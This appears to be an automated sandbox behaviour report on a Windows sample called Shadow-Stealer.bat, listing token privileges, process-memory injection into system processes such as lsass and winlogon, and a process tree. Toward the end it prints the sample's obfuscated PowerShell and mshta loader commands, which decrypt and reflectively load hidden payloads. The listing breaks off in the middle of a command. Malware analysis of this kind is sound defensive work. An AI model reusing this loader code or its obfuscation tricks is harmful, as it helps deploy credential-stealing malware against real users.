Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3588 wrote to memory of 1904 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe
PID 3588 wrote to memory of 1904 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe
PID 1904 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 1904 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 1904 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 1904 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 1904 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 1904 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 1904 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 1904 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 1904 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 1904 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 1904 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 1904 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 1904 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 1904 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 1904 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 1904 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 1160 wrote to memory of 4396 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 1160 wrote to memory of 4396 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 4396 wrote to memory of 3264 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 4396 wrote to memory of 3264 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 3264 wrote to memory of 1932 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1932 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1932 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1932 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1932 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1932 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1932 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 2864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3264 wrote to memory of 2864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3264 wrote to memory of 2864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3264 wrote to memory of 2864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3264 wrote to memory of 2864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3264 wrote to memory of 2864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3264 wrote to memory of 2864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3264 wrote to memory of 2864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3264 wrote to memory of 2864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3264 wrote to memory of 2536 N/A C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe
PID 3264 wrote to memory of 2536 N/A C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe
PID 3264 wrote to memory of 1684 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1684 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1684 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1684 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1684 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1684 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1684 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1684 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1684 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1684 wrote to memory of 636 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 1684 wrote to memory of 692 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 1684 wrote to memory of 1000 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1684 wrote to memory of 556 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 1684 wrote to memory of 708 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1684 wrote to memory of 752 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1684 wrote to memory of 1076 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1684 wrote to memory of 1084 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1684 wrote to memory of 1136 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1684 wrote to memory of 1208 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1684 wrote to memory of 1252 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1684 wrote to memory of 1308 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1684 wrote to memory of 1432 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1684 wrote to memory of 1472 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1684 wrote to memory of 1492 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe

"Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{3455b23a-1e77-4396-b01f-d91fa209e7b4}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{13190d35-2ee9-4a8b-9f54-2eb814499454}

C:\Windows\$sxr-mshta.exe

C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"

C:\Windows\$sxr-cmd.exe

"C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\$sxr-powershell.exe

C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 
'')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] 
-join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = 